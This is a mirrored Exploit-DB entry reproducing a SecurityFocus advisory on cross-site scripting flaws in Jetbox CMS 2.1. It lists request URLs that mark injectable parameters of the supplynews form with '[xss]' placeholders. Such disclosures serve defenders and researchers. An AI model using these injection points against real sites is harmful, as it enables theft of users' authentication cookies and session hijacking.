bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/30042.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

14 lines
No EOL
1.5 KiB
Text
Raw Blame History

source: https://www.securityfocus.com/bid/23999/info
Jetbox CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
Jetbox CMS 2.1 is vulnerable.
http://www.example.com/jetbox/index.php/view/supplynews/?companyname=[xss]
http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=[xss]
http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=[xss] http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=[xss] http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=[xss]
http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=1&recipient=jetbox@www.example2.com&require[xss]
http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=&recipient=jetbox@www.example2.com&required=firstname,surname,email,companyname,country,workphone,title,topic,website,text&signupsubmit=true&subject=News&submit=Send&surname=[xss]
http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=1&recipient=jetbox@www.example2.com&required=firstname,surname,email,companyname,country,workphone,title,topic,website,text&signupsubmit=true&subject=News&submit=Send&surname=1&text=1&title=[xss]
Reference in a new issue View git blame Copy permalink